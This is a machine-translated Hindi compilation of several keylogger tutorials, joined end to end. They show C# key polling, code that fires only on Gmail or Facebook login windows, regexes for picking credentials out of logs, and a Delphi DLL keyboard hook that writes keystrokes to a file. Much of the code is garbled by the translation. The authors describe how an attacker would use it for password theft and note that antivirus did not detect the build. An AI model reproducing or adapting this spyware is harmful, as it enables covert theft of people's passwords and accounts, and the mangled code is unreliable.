सूचना सुरक्षा प्रयोगशाला। कीलॉगर, या उसने कीबोर्ड पर क्या टाइप किया? पायथन में एक सरल कीलॉगर बनाना

हैकर जगत को हमलावरों के तीन समूहों में विभाजित किया जा सकता है:


1) "स्किड्स" (स्क्रिप्ट किडीज़) - छोटे नौसिखिया हैकर जो कोड और उपयोगिताओं के प्रसिद्ध टुकड़े एकत्र करते हैं और कुछ सरल मैलवेयर बनाने के लिए उनका उपयोग करते हैं।


2) "खरीदार" बेईमान उद्यमी, किशोर और अन्य रोमांच-चाहने वाले हैं। वे इंटरनेट पर ऐसे सॉफ़्टवेयर लिखने के लिए सेवाएँ खरीदते हैं, इसकी मदद से विभिन्न निजी जानकारी एकत्र करते हैं और संभवतः इसे दोबारा बेचते हैं।


3) "ब्लैक हैट कोडर्स" - प्रोग्रामिंग गुरु और वास्तुकला विशेषज्ञ। वे नोटपैड में कोड लिखते हैं और स्क्रैच से नए कारनामे विकसित करते हैं।


क्या अच्छे प्रोग्रामिंग कौशल वाला कोई व्यक्ति अंतिम व्यक्ति बन सकता है? मुझे नहीं लगता कि आप कुछ DEFCON सत्रों में भाग लेने के बाद रेगिन (लिंक) जैसा कुछ बनाना शुरू करेंगे। दूसरी ओर, मेरा मानना ​​है कि एक सूचना सुरक्षा अधिकारी को कुछ अवधारणाओं पर महारत हासिल करनी चाहिए जिन पर मैलवेयर बनाया जाता है।


सूचना सुरक्षा कर्मियों को इन संदिग्ध कौशलों की आवश्यकता क्यों है?


आपके दुश्मन को पता है। जैसा कि हमने इनसाइड आउट ब्लॉग पर चर्चा की, आपको उसे रोकने के लिए अपराधी की तरह सोचने की ज़रूरत है। मैं वरोनिस में एक सूचना सुरक्षा विशेषज्ञ हूं और मेरे अनुभव से, आप इस कला में मजबूत होंगे यदि आप समझते हैं कि एक हमलावर क्या कदम उठाएगा। इसलिए मैंने मैलवेयर के पीछे के विवरण और हैकिंग टूल के विभिन्न परिवारों के बारे में पोस्ट की एक श्रृंखला शुरू करने का निर्णय लिया। एक बार जब आपको एहसास हो जाए कि पता न चल पाने वाला सॉफ़्टवेयर बनाना कितना आसान है, तो आप अपने उद्यम की सुरक्षा नीतियों पर पुनर्विचार करना चाहेंगे। अब और अधिक विस्तार से.


इस अनौपचारिक "हैकिंग 101" कक्षा के लिए, आपको कुछ प्रोग्रामिंग ज्ञान (सी# और जावा) और विंडोज आर्किटेक्चर की बुनियादी समझ की आवश्यकता है। ध्यान रखें कि वास्तव में मैलवेयर C/C++/डेल्फ़ी में लिखा गया है ताकि फ्रेमवर्क पर निर्भर न रहें।


keylogger


कीलॉगर एक सॉफ्टवेयर या किसी प्रकार का भौतिक उपकरण है जो किसी क्षतिग्रस्त मशीन पर कीस्ट्रोक्स को रोक सकता है और याद रख सकता है। इसे कीबोर्ड पर प्रत्येक कीस्ट्रोक के लिए एक डिजिटल जाल के रूप में सोचा जा सकता है।
अक्सर यह फ़ंक्शन अन्य, अधिक जटिल सॉफ़्टवेयर में कार्यान्वित किया जाता है, उदाहरण के लिए, ट्रोजन (रिमोट एक्सेस ट्रोजन आरएटीएस), जो हमलावर को इंटरसेप्ट किए गए डेटा की डिलीवरी सुनिश्चित करता है। हार्डवेयर कीलॉगर्स भी हैं, लेकिन वे कम आम हैं क्योंकि... मशीन तक सीधी भौतिक पहुंच की आवश्यकता है।


हालाँकि, बुनियादी कीलॉगर फ़ंक्शन बनाना प्रोग्राम करना काफी आसान है। चेतावनी। यदि आप निम्नलिखित में से कोई भी प्रयास करना चाहते हैं, तो सुनिश्चित करें कि आपके पास अनुमतियाँ हैं और आप मौजूदा वातावरण को बाधित नहीं कर रहे हैं, और यह सब एक अलग वीएम पर करना सबसे अच्छा है। इसके बाद, इस कोड को अनुकूलित नहीं किया जाएगा, मैं आपको केवल कोड की पंक्तियाँ दिखाऊंगा जो कार्य को पूरा कर सकती हैं, यह सबसे सुंदर या इष्टतम तरीका नहीं है। और अंत में, मैं आपको यह नहीं बताऊंगा कि किसी कीलॉगर को रिबूट के प्रति प्रतिरोधी कैसे बनाया जाए या विशेष प्रोग्रामिंग तकनीकों का उपयोग करके इसे पूरी तरह से ज्ञानीभूत बनाने का प्रयास कैसे किया जाए, साथ ही पता चलने पर भी इसे हटाए जाने से कैसे बचाया जाए।



कीबोर्ड से कनेक्ट करने के लिए आपको C# में केवल 2 पंक्तियों का उपयोग करना होगा:


1. 2. 3. सार्वजनिक स्थैतिक बाहरी int GetAsyncKeyState(Int32 i);

आप MSDN पर GetAsyncKeyState फ़ंक्शन के बारे में अधिक जान सकते हैं:


समझने के लिए: यह फ़ंक्शन निर्धारित करता है कि कॉल के समय कोई कुंजी दबाई गई थी या जारी की गई थी और क्या इसे पिछली कॉल के बाद दबाया गया था। अब हम कीबोर्ड से डेटा प्राप्त करने के लिए इस फ़ंक्शन को लगातार कॉल करते हैं:


1. जबकि (सत्य) 2. ( 3. थ्रेड.स्लीप(100); 4. for (Int32 i = 0; i< 255; i++) 5. { 6. int state = GetAsyncKeyState(i); 7. if (state == 1 || state == -32767) 8. { 9. Console.WriteLine((Keys)i); 10. 11. } 12. } 13. }

यहाँ क्या चल रहा है? यह लूप प्रत्येक कुंजी की स्थिति निर्धारित करने के लिए प्रत्येक 100ms पर मतदान करेगा। यदि उनमें से एक को दबाया जाता है (या दबाया गया है), तो इसके बारे में एक संदेश कंसोल पर प्रदर्शित होगा। वास्तविक जीवन में, यह डेटा बफ़र किया जाता है और हमलावर को भेजा जाता है।


स्मार्ट कीलॉगर

रुको, क्या सभी एप्लिकेशन से सारी जानकारी हटाने का प्रयास करने का कोई मतलब है?
उपरोक्त कोड वर्तमान में फोकस वाली किसी भी विंडो और इनपुट फ़ील्ड से कच्चे कीबोर्ड इनपुट को खींचता है। यदि आपका लक्ष्य क्रेडिट कार्ड नंबर और पासवर्ड है, तो यह दृष्टिकोण बहुत प्रभावी नहीं है। वास्तविक दुनिया के परिदृश्यों के लिए, जब ऐसे कीलॉगर्स को सैकड़ों या हजारों मशीनों पर निष्पादित किया जाता है, तो बाद में डेटा पार्सिंग बहुत लंबी और अंततः अर्थहीन हो सकती है, क्योंकि किसी हमलावर के लिए मूल्यवान जानकारी तब तक पुरानी हो सकती है।


आइए मान लें कि मैं लाइक बेचने के लिए फेसबुक या जीमेल क्रेडेंशियल्स हासिल करना चाहता हूं। फिर एक नया विचार यह है कि कीलॉगिंग को तभी सक्रिय किया जाए जब ब्राउज़र विंडो सक्रिय हो और पेज शीर्षक में जीमेल या फेसबुक शब्द हो। इस पद्धति का उपयोग करके मैं क्रेडेंशियल प्राप्त करने की संभावना बढ़ाता हूं।


कोड का दूसरा संस्करण:


1. जबकि (सत्य) 2. ( 3. IntPtr हैंडल = GetForegroundWindow(); 4. if (GetWindowText(हैंडल, बफ़, वर्ण) > 0) 5. ( 6. स्ट्रिंग लाइन = buff.ToString(); 7. यदि (line.Contains("Gmail")|| लाइन.Contains("Facebook - लॉग इन या साइन अप")) 8. ( 9. //कीबोर्ड चेक 10. ) 11. ) 12. थ्रेड.स्लीप(100); 13. )

यह स्निपेट प्रत्येक 100ms पर सक्रिय विंडो का पता लगाएगा। यह GetForegroundWindow फ़ंक्शन (MSDN पर अधिक जानकारी) का उपयोग करके किया जाता है। पेज का शीर्षक बफ़ वेरिएबल में संग्रहीत है, यदि इसमें जीमेल या फेसबुक है, तो कीबोर्ड स्कैनिंग खंड को कहा जाता है।


ऐसा करके, हमने यह सुनिश्चित किया कि कीबोर्ड केवल तभी स्कैन किया जाए जब फेसबुक और जीमेल साइटों पर ब्राउज़र विंडो खुली हो।


एक और भी अधिक स्मार्ट कीलॉगर


आइए मान लें कि हमलावर हमारे जैसे कोड का उपयोग करके डेटा प्राप्त करने में सक्षम था। आइए यह भी मान लें कि वह इतना महत्वाकांक्षी है कि दसियों या सैकड़ों हजारों मशीनों को संक्रमित कर सकता है। परिणाम: गीगाबाइट टेक्स्ट वाली एक विशाल फ़ाइल जिसमें आवश्यक जानकारी अभी भी ढूंढी जानी है। अब रेगुलर एक्सप्रेशन या रेगेक्स से परिचित होने का समय आ गया है। यह कुछ टेम्प्लेट बनाने और दिए गए टेम्प्लेट के अनुपालन के लिए टेक्स्ट को स्कैन करने के लिए एक छोटी भाषा की तरह है। आप यहां और बहुत कुछ मिल सकता है।


सरल बनाने के लिए, मैं तुरंत तैयार अभिव्यक्ति दूंगा जो लॉगिन नाम और पासवर्ड से मेल खाती है:


1. //डाक पते की तलाश में 2. ^[\w!#$%&"*+\-/=?\^_`(|)~]+(\.[\w!#$%&"* + \-/=?\^_`(|)~]+)*@((([\-\w]+\.)+(2,4))|(((1,3)\.) ( 3)(1,3)))$ 3. 4. 5. //पासवर्ड ढूंढ रहे हैं 6. (?=^.(6,)$)(?=.*\d)(?=.*)

ये अभिव्यक्तियाँ यहाँ एक संकेत के रूप में हैं कि इनका उपयोग करके क्या किया जा सकता है। रेगुलर एक्सप्रेशन का उपयोग करके, आप किसी भी संरचना को खोज सकते हैं (और ढूंढ सकते हैं!) जिसका एक विशिष्ट और अपरिवर्तनीय प्रारूप है, उदाहरण के लिए, पासपोर्ट नंबर, क्रेडिट कार्ड, खाते और यहां तक ​​कि पासवर्ड भी।
वास्तव में, नियमित अभिव्यक्ति सबसे अधिक पढ़ने योग्य प्रकार का कोड नहीं है, लेकिन यदि पाठ पार्सिंग कार्य हैं तो वे प्रोग्रामर के सबसे अच्छे दोस्तों में से एक हैं। जावा, सी#, जावास्क्रिप्ट और अन्य लोकप्रिय भाषाओं में पहले से ही तैयार फ़ंक्शन हैं जिनमें आप नियमित रेगुलर एक्सप्रेशन पास कर सकते हैं।


C# के लिए यह इस तरह दिखता है:


1. रेगेक्स पुनः = नया रेगेक्स (@"^[\w!#$%&"*+\-/=?\^_`(|)~]+(\.[\w!#$%&"* +\-/=?\^_`(|)~]+)*@((([\-\w]+\.)+(2,4))|(((1,3)\.) (3)(1,3)))$"); 2. रेगेक्स re2 = नया रेगेक्स (@"(?=^.(6,)$)(?=.*\d)(?=.*)"); 3. स्ट्रिंग ईमेल = " [ईमेल सुरक्षित]"; 4. स्ट्रिंग पास = "abcde3FG"; 5. मिलान परिणाम = पुनः मिलान(ईमेल); 6. मिलान परिणाम2 = पुनः2. मिलान(पास);

जहां पहली अभिव्यक्ति (re) किसी भी ईमेल से मेल खाएगी, और दूसरी (re2) 6 अक्षरों से अधिक किसी भी अल्फ़ान्यूमेरिक संरचना से मेल खाएगी।


मुफ़्त और पूरी तरह से ज्ञानी नहीं


मेरे उदाहरण में, मैंने 30 मिनट में ऐसा कीलॉगर बनाने के लिए विज़ुअल स्टूडियो का उपयोग किया - आप अपने पसंदीदा वातावरण का उपयोग कर सकते हैं।
यदि मैं एक वास्तविक हमलावर होता, तो मैं कुछ वास्तविक लक्ष्य (बैंकिंग साइट्स, सोशल नेटवर्क इत्यादि) को निशाना बनाता और इन लक्ष्यों से मेल खाने के लिए कोड को संशोधित करता। निःसंदेह, मैं हमारे कार्यक्रम के साथ एक नियमित चालान या अन्य अनुलग्नक के रूप में एक फ़िशिंग ईमेल अभियान भी चलाऊंगा।


एक प्रश्न बना हुआ है: क्या ऐसे सॉफ़्टवेयर वास्तव में सुरक्षा कार्यक्रमों द्वारा पहचाने नहीं जा सकेंगे?


मैंने अपना कोड संकलित किया और वायरसटोटल वेबसाइट पर exe फ़ाइल की जाँच की। यह एक वेब-आधारित उपकरण है जो आपके द्वारा डाउनलोड की गई फ़ाइल के हैश की गणना करता है और इसे ज्ञात वायरस के डेटाबेस के विरुद्ध खोजता है। आश्चर्य! स्वाभाविक रूप से कुछ भी नहीं मिला.



यह मुख्य बिंदु है! आप हमेशा कोड को बदल सकते हैं और विकसित कर सकते हैं, हमेशा खतरे वाले स्कैनर से कुछ कदम आगे रह सकते हैं। यदि आप अपना स्वयं का कोड लिखने में सक्षम हैं तो यह निश्चित है कि इसका पता नहीं लगाया जा सकेगा। आप इस पेज पर पूरा विश्लेषण पढ़ सकते हैं।


इस लेख का मुख्य उद्देश्य यह दिखाना है कि अकेले एंटीवायरस का उपयोग करके आप अपने उद्यम में पूरी तरह से सुरक्षा सुनिश्चित नहीं कर पाएंगे। संभावित दुर्भावनापूर्ण कार्यों की पहचान करने के लिए सभी उपयोगकर्ताओं और यहां तक ​​कि सेवाओं के कार्यों का अधिक गहन मूल्यांकन आवश्यक है।


अगले लेख में मैं दिखाऊंगा कि ऐसे सॉफ़्टवेयर का वास्तव में पता न चल सकने वाला संस्करण कैसे बनाया जाए।

कीलॉगर्स लिखने के बारे में
पहले भी कई बार कहा जा चुका है, लेकिन सभी
एक बड़ी खामी है - एक नियम के रूप में,
बहुत सीमित ज्ञान की आवश्यकता है
जानकारी, सब कुछ लॉग फ़ाइल में लिखने के बजाय,
उपयोगकर्ता कीबोर्ड पर जो लिखता है वह आपके लिए संभव नहीं है
विचार लॉग के लिए बहुत सारा भोजन देगा
सीएस खेलते समय बटन दबाना 😉

इससे यह पता चलता है कि जासूस अवश्य होगा
उन्नत, और मूर्खतापूर्ण ढंग से वह सब कुछ न लिखें
वे उसे देते हैं :) ऐसे कार्यक्रम का नाम भी बताएं
एक जासूस अपनी जीभ नहीं घुमाता - यह लगभग है
इलेक्ट्रॉनिक एजेंट 007:-))) तरीके
ताकि प्रोग्राम रुचि के लॉग में लिख सके
हमारे पास बहुत सारी सामग्री है. सबसे सरल -
सक्रिय विंडोज़ को नियंत्रित करें, अर्थात जिसमें
इस समय बटन बंद हो रहे हैं :) आप कैसे हैं,
मुझे लगता है, आप जानते हैं, जासूस आमतौर पर शामिल होते हैं
निष्पादन योग्य फ़ाइल और DLL. यह इस तथ्य के कारण है
विंडो पर संदेशों को कैसे रोकें?
आपको एक नई प्रक्रिया, और बहुत कुछ बनाने की आवश्यकता है
ऐसा करने का एक सुविधाजनक तरीका dll का उपयोग करना है।
इसलिए, सक्रिय करने के लिए
वास्तव में लकड़हारा ही, आपको सही में इसकी आवश्यकता होगी
DLL लोड करने का क्षण, और जब विंडो सक्रिय हो
किसी और चीज़ में परिवर्तन - इसे मेमोरी से अनलोड करें।

आइए विज़ुअल भाषा में डीएलएल के साथ काम करने के कार्यों को देखें
सी++. डीएलएल को मेमोरी में लोड किया जा रहा है
फ़ंक्शन hINSTAGE=LoadLibrary("name.dll"), जहां hINSTAGE -
मेमोरी में लोड किए गए DLL के डिस्क्रिप्टर की तरह,
name.dll - लाइब्रेरी का नाम। इसे उतारने के लिए,
एक फ़ंक्शन है FreeLibrary(hINSTAGE);

अब हम अपनी जरूरत की चीजें कैसे प्राप्त कर सकते हैं इसके बारे में
अनुप्रयोग। उदाहरण के लिए, हम जानते हैं कि उपयोगकर्ता
वेबसाइट www.mail.ru के माध्यम से मेल पढ़ता है, तो आप कर सकते हैं
एजेंट को कॉन्फ़िगर करें ताकि वह इंटरसेप्ट कर सके
जब उपयोगकर्ता इस पर जाता है तो कीस्ट्रोक्स करता है
वेबसाइट। (यह याद रखना चाहिए कि कुछ में
कोई भी कीबोर्ड जासूस ऐप्स नहीं हैं
उदाहरण के लिए, एड्रेस बार में काम कर सकता है
इंटरनेट एक्सप्लोरर"ए - यह "क्रैश" की ओर ले जाता है
कार्यक्रमों का समापन" - आप और कहां से हैं
विंडोज़ चाहता था :))) इस विधि के लिए यह काफी है
डायलर से पासवर्ड पढ़ना भी उपयुक्त है
- यदि उपयोगकर्ता व्यामोह से पीड़ित है और हर समय
लॉगिन दर्ज करें और मैन्युअल रूप से पास करें :) या आप वास्तव में करते हैं
यह जानना दिलचस्प है कि वह आउटलुक में क्या लिखते हैं
एक नोटपैड में. यहां कोड का वह भाग है जो करता है
विंडो शीर्षकों की उन शीर्षकों से तुलना करें जिनकी हमें आवश्यकता है।

हिनस्टेज हिनस्टेज;

जबकि (1)
{
// लूप प्रारंभ करें.

int sl,ll;
ll=1;
sl=2;
// के लिए चर
विरोध करना
एक।
चार सेंट;
HWND कैसे;
// आइए सबसे सरल के साथ चलते हैं
द्वारा - वर्ण दर वर्ण स्ट्रिंग की तुलना करना:
परिणामी विंडो शीर्षक और जिसकी हमें आवश्यकता है उसके साथ
रेखा।

जबकि (ll!=sl)
{

hw=GetForegroundWindow();
GetWindowText(hw,st,128); // पढ़ना

char stt='_यहाँ हम वांछित का शीर्षक लिखते हैं
हमारे लिए विंडोज़_№1";

sl=strlen(stt);
ll=0;
जबकि (stt==st)
//तुलना करना
चरित्र द्वारा पंक्ति
// जिस स्थिति में होगा, वहां से ऐसा करना अधिक सुविधाजनक है
जाँचें कि क्या आवश्यक चीज़ फिट बैठती है
//हम स्ट्रिंग का उपयोग किसी अन्य स्ट्रिंग के भाग के रूप में कर सकते हैं, आप कर सकते हैं
//एक विस्तृत फ़िल्टर जैसा कुछ बनाएं।

{
ll++;
}

यदि (ll==sl) ( //यदि स्ट्रिंग्स
पहली पंक्ति के अंत तक मिलान करें -

रुकना; // प्रक्रिया को बाधित करें
}
// और इसी तरह - यदि
आपको एकाधिक विंडोज़ की उपस्थिति की जाँच करने की आवश्यकता है।

char stt='_यहाँ हम वांछित का शीर्षक लिखते हैं
हमारे लिए विंडोज़_नंबर 2";
sl=strlen(stt);
ll=0;
जबकि (stt==st)
{
ll++;
}

यदि (ll==sl) (
रुकना; // प्रक्रिया को बाधित करें
}

अनुक्रमिक जाँच के बजाय, आप कर सकते हैं
तुलना करने पर समानांतर बनाएं
पंक्ति तत्वों का एक चक्र, यदि कम से कम एक
मिलान - तब DLL जासूस सक्रिय हो जाता है।

hINSTAGE=LoadLibrary('key1.dll');

अब हमें हर समय जांच करने की जरूरत है
क्या यह विंडो सक्रिय रहती है।

जबकि (ll==sl) //अलविदा
रेखाएँ मेल खाती हैं - हम जगह-जगह घूमते हैं

{
hw=GetForegroundWindow();
GetWindowText(hw,st,128);
// पढ़ना
वर्तमान में सक्रिय विंडो.

ll=0;
जबकि (stt==st)
{
ll++;
}
}

चक्र से बाहर निकलना सक्रिय होने का संकेत देता है
विंडो बदल गई है, इसलिए आगे हम "स्पाइवेयर" अनलोड करते हैं
पुस्तकालय और चक्र शुरुआत से शुरू होता है - अर्थात।
प्रोग्राम फिर से इनमें से किसी एक की प्रतीक्षा करता है
आवश्यक खिड़कियाँ.

फ्रीलाइब्रेरी(hINSTAGE);

हालाँकि, उपरोक्त विधि भी है
नुकसान- हर बार जांच करानी पड़ती है
विंडोज़ की पूरी सूची में से क्या वह विंडोज़ है जिसकी आपको आवश्यकता है?
हम इस समय सक्रिय हैं। इसीलिए
आप किसी भिन्न एल्गोरिथम का उपयोग कर सकते हैं - जाँच न करें
विंडो शीर्षक, और इसमें देखें
EditBox प्रकार के विंडो तत्व। एक नियम के रूप में,
पासवर्ड वहां लिखे गए हैं :) इसके लिए वहां होंगे
इस विंडो के तत्वों को देखें - और यदि
उनमें से एडिट है - फिर हम डीएलएल लोड करते हैं।

चार पी2,पी3; //सरणी
विंडो शीर्षकों के लिए वर्ण.

फिर से, हम सभी विंडो को एक लूप में जांचते हैं:

जबकि (p3!='संपादित करें') //अलविदा
हमें एडिटबॉक्स वाली कोई विंडो नहीं मिली - एक लूप चलाएँ

{

hw=GetForegroundWindow();

HWND hwnd_child; //चर
खिड़की तत्व

hwnd_child = GetWindow(hw,GW_CHILD);
GetClassName(hwnd_child,p3,128);
यदि (p3!='संपादित करें')
//यदि पहला है
विंडो तत्व मिले - एडिटबॉक्स नहीं - फिर
आगे देख रहे हैं

{
जबकि (hwnd_child!=0)
{
hwnd_child = GetWindow(hwnd_child, GW_HWNDNEXT);

GetClassName(hwnd_child,p3,128);
यदि (p3=='संपादित करें')
{
रुकना;
}
}
}
}

अब जासूस डीएलएल के बारे में ही।
इसे डेल्फ़ी में लिखना बेहतर है, क्योंकि यह
पास्कल के परिपक्व वंशज के पास ऐसा नहीं है
विकृत "सिपिपिश" आदत
डेटा प्रकारों के बारे में चयन करना। उत्पन्न करना
लाइब्रेरी का चयन करें फ़ाइल-न्यू-डायरेक्ट लिंक लाइब्रेरी - और
DLL के लिए टेम्पलेट तैयार है. और यहाँ कोड स्वयं है:

पुस्तकालय कुंजी1;
विंडोज़ का उपयोग करता है;

वर
ख़ूक: हहुक; // के लिए चर
"जाल"

फ़ंक्शन KProc(कोड: पूर्णांक; wParam: Word; lParam: LongInt): LongInt; एसटीडीकॉल;
कॉन्स्ट
केस्टेट: पूर्णांक = 1073741824; //कोड
"कुंजी दबायी गयी"

वर
सिमव: शॉर्टस्ट्रिंग;
केएल: चार की सरणी; //के लिए
कीबोर्ड लेआउट की जाँच करना

एफस्ट्रक्चर: टॉफस्ट्रक्चर;
एफ: टेक्स्टफ़ाइल;
//चर
लॉग रिकॉर्ड करने के लिए फ़ाइल।

शुरू

// अनावश्यक चीजों को हटा दें
संदेशों
यदि (lParam और KState)<>0 तो
शुरू

बाहर निकलना;
अंत;

AssignFile(F, "keylog.txt");

// खोलने का प्रयास कर रहा हूँ
फ़ाइल "keylog.txt":
यदि OpenFile(PChar("keylog.txt"), FStruct, OF_EXIST) = HFILE_ERROR तो
शुरू
पुनः लिखें(एफ);
// यदि फ़ाइल नहीं है
बनाया - हम बनाते हैं।

अंत
अन्यथा जोड़ें(एफ);
//यदि है तो लिखें
अंत।

सिमव:=chr(0); //शून्य पर रीसेट करें
कुंजीपटल से पढ़ा गया प्रतीक का चर।

// कोड का विश्लेषण करें
कुंजी दबायी गयी
केस wParam का
// संख्याएँ
48..57: Simv:=Chr(wParam);
96: सिमव:='0';
97: सिमव:='1';
...
104: सिमव:='8';
105: सिमव:='9';
189,109: सिमव:='-';
110: सिमव:='';
111: सिमव:='/';
अंत;

GetKeyboardLayoutName(KL); //
लेआउट की जाँच करना

यदि केएल = "00000409" तो // अगर
लैटिन:

शुरू
केस wParam का
219: सिमव:='[';
221: सिमव:=']';
186: सिमव:=';';
222: सिमव:='''';
188: सिम्व:='';
190: सिमव:='';
191: सिमव:='/';
65..90: Simv:=Chr(wParam);
अंत;
अंत;
अंत;
यदि केएल = "00000419" तो
// अगर
रूसी

शुरू
केस wParam का
219: सिमव:='एक्स';
221: Simv:='Ъ';
186: सिमव:='एफ';
222: सिमव:='ई';
188: सिमव:='बी';
190: सिम्व:='यू';
191: सिमव:='';
65: सिमव:='एफ';
...
87: सिमव:='सी';
88: सिमव:='एच';
89: सिमव:='एन';
90: सिमव:='मैं';
अंत;

//यदि प्रतीक खाली नहीं है (अर्थात्
यदि अल्फ़ान्यूमेरिक कुंजी दबायी गयी हो)
// फिर इसे एक फ़ाइल में लिखें
यदि सिमव<>"" तब
लिखें(एफ, सिमव);
//फ़ाइल बंद करें
क्लोज़फ़ाइल(एफ);

//संदेश भेजें
सिस्टम में अन्य जाल
परिणाम:=CallNextHookEx(KHook, कोड, wParam, lParam);
अंत;

शुरू
//जाल सेट करें
कीबोर्ड संदेशों को इंटरसेप्ट करने के लिए.

KHook:=SetWindowsHookEx(WH_KEYBOARD, @KProc, HInstance, 0);

इस कार्यक्रम को सरल भी बनाया जा सकता है
आवेदन के आधार पर - यदि
मान लीजिए कि आपको केवल एक बार गिनने की आवश्यकता है
डायलर से पासवर्ड - फिर आप सेट कर सकते हैं
जब तक हमें इसकी आवश्यकता न हो, और जब इसकी आवश्यकता हो, तब तक खिड़कियों की जाँच करना
सक्रिय हो जाएगा - लाइब्रेरी लोड करें
key1.dll, एक निश्चित समय तक प्रतीक्षा करें
जिसमें उपयोगकर्ता के पास इन अक्षरों को टाइप करने का समय होगा
कीबोर्ड और फिर लाइब्रेरी को अनलोड करें
कार्यक्रम समाप्त करें. कुछ इस तरह :)

hINSTAGE=LoadLibrary('key1.dll');
नींद(10000);
// इसके लिए 10 सेकंड प्रतीक्षा करें
जिस समय उपयोगकर्ता पासवर्ड टाइप करेगा।
// समय के आधार पर बढ़ाया जा सकता है
उपयोगकर्ता के निषेध के स्तर पर निर्भर करता है
// और कीबोर्ड पर उसकी टाइपिंग स्पीड :)

फ्रीलाइब्रेरी(hINSTAGE);

पुनश्च: उपरोक्त सभी सामग्री दी गई थी
विशेष रूप से डेमो और के साथ
सामान्य शैक्षिक लक्ष्य, लेखक ने निर्धारित किये
मेरे पास प्रदर्शित करने का एक कार्य है
"उन्नत" प्रकार का प्रोग्राम एल्गोरिदम
कीलॉगर" और सभी
इसके उपयोग की जिम्मेदारी
सामग्री आपके ऊपर गिरती है (भारी
बोझ 🙂) कोड के कार्यान्वयन में शामिल है
छोटी-मोटी अशुद्धियाँ जो वास्तव में नुकसान नहीं पहुँचातीं
एल्गोरिदम - उन्हें स्वयं खोजने का प्रयास करें))।

पीएसएस: बेशक, एक कीलॉगर ही नहीं कर सकता
इसका मुख्य कार्य करें -
वास्तव में लॉग में बटन दबाने पर भी लिखें
अपनी आवश्यकता के अनुसार दबाई गई कुंजियों के मान बदलें
स्वाद - लेकिन यह कैसे करें और इसके लिए क्या है
बस महत्वपूर्ण हो सकता है - में
अगली बार :)

नमस्कार, खाबरोवस्क निवासियों।

मैंने WinAPI का उपयोग करके C++ में एक सॉफ़्टवेयर कीबोर्ड लॉगर लिखने का निर्णय लिया। मैं यह नहीं कह सकता कि जब मैंने इसे लिखा था तो मैं किसी प्रकार के जासूसी लक्ष्य का पीछा कर रहा था; बल्कि, मैं WinAPI हुक से परिचित हो रहा था। चूँकि यह इतना बुरा नहीं निकला, और सॉफ्टवेयर लॉगर्स के बारे में हैबे पर कोई लेख नहीं है, इसलिए मैंने अपना खुद का लिखने का फैसला किया।

यह कैसे किया जाता है?

की-प्रेस को पकड़ने के लिए एक कीबोर्ड हुक का उपयोग किया गया था।

HHOOK WinAPI SetWindowsHookEx(_In_ int idHook, _In_ HOOKPROC lpfn, _In_ HINSTANCE hMod, _In_ DWORD dwThreadId);

सभी कीबोर्ड कीस्ट्रोक्स को इंटरसेप्ट करने के लिए, WH_KEYBOARD या WH_KEYBOARD_LL को idHook पैरामीटर के रूप में निर्दिष्ट करना सुविधाजनक है। एकमात्र अंतर यह है कि WH_KEYBOARD_LL सिस्टम कुंजी प्रेस (यानी Alt या Alt दबाए रखने पर कोई कुंजी) को भी इंटरसेप्ट करता है, इसलिए हम इसे चुनेंगे।

एलपीएफएन एक फ़ंक्शन का सूचक है जो इंटरसेप्ट किए गए संदेशों (हमारे मामले में, कीस्ट्रोक्स) को संसाधित करता है।
hMod एक एप्लिकेशन इंस्टेंस हैंडल है जिसमें प्रोसेसिंग फ़ंक्शन होता है।
dwThreadId उस थ्रेड का पहचानकर्ता है जिसके संदेशों को हम इंटरसेप्ट करना चाहते हैं। सभी थ्रेड्स से संदेशों को इंटरसेप्ट करने के लिए इस पैरामीटर को 0 पर सेट किया जाना चाहिए।

रिटर्न वैल्यू हमारे हुक के लिए एक हैंडल है, जिसे बाहर निकलने पर UnhookWindowsHookEx फ़ंक्शन से मुक्त करने की आवश्यकता होगी।
मदद के लिए एमएसडीएन को देखते हुए, हम एक फ़ंक्शन का प्रोटोटाइप देखते हैं जो इस हुक से संदेशों को संसाधित करता है।

एलपरिणाम कॉलबैक लोलेवलकीबोर्डप्रोक(_In_ int nCode, _In_ WPARAM wParam, _In_ LPARAM lParam);

nCode HC_ACTION के बराबर होना चाहिए, अन्यथा संदेश किसी अन्य प्रक्रिया को दिया जाता है।
wParam निम्नलिखित मानों में से एक है: WM_KEYDOWN, WM_KEYUP, WM_SYSKEYDOWN, या WM_SYSKEYUP।
lParam KBDLLHOOKSTRUCT संरचना के लिए एक सूचक है, जिसके क्षेत्र में हम केवल 2 मापदंडों में रुचि रखते हैं: vkCode (वर्चुअल कोड) और दबाए गए कुंजी का स्कैनकोड।
इस फ़ंक्शन को CallNextHookEx फ़ंक्शन का मान वापस करना होगा, अन्यथा ईवेंट को संसाधित करने वाले अगले हुक को गलत संदेश पैरामीटर प्राप्त हो सकते हैं।
हर बार जब कोई कुंजी दबाई जाती है, तो हमारा प्रोग्राम इस घटना को रोक देगा और इसे हमारी लोलेवलकीबोर्डप्रोक प्रक्रिया के साथ संसाधित करेगा।

किसी कुंजी के वर्चुअल और स्कैन कोड को प्रतीकात्मक रूप में पुनः अनुवाद करने के लिए, हमें ToAsciiEx फ़ंक्शन की आवश्यकता होती है।

Int WinAPI ToAsciiEx(_In_ UINT uVirtKey, _In_ UINT uScanCode, _In_opt_ const BYTE *lpKeyState, _Out_ LPWORD lpChar, _In_ UINT uFlags, _In_opt_ HKL dwhkl);

पहले 2 पैरामीटर क्रमशः कुंजी के वर्चुअल और स्कैन कोड हैं।
lpKeyState - कीबोर्ड स्थिति, जाँचता है कि कौन सी कुंजियाँ दबाई गई/सक्रिय हैं।
lpChar एक दोहरे शब्द का सूचक है जिसमें फ़ंक्शन कुंजी का प्रतीकात्मक प्रतिनिधित्व लिखेगा।
यूफ्लैग्स मेनू गतिविधि को दर्शाने वाला एक पैरामीटर है।
dwhkl - कीबोर्ड लेआउट पहचानकर्ता।
वापसी मान lpChar बफ़र पर लिखे गए वर्णों की संख्या है। हम उस मामले में रुचि रखते हैं जब 1 अक्षर लिखा जाता है।
मूल रूप से, ये सबसे सरल कीबोर्ड लॉगर के लिए आवश्यक 3 मुख्य कार्य हैं।

कार्यक्रम के बारे में थोड़ा

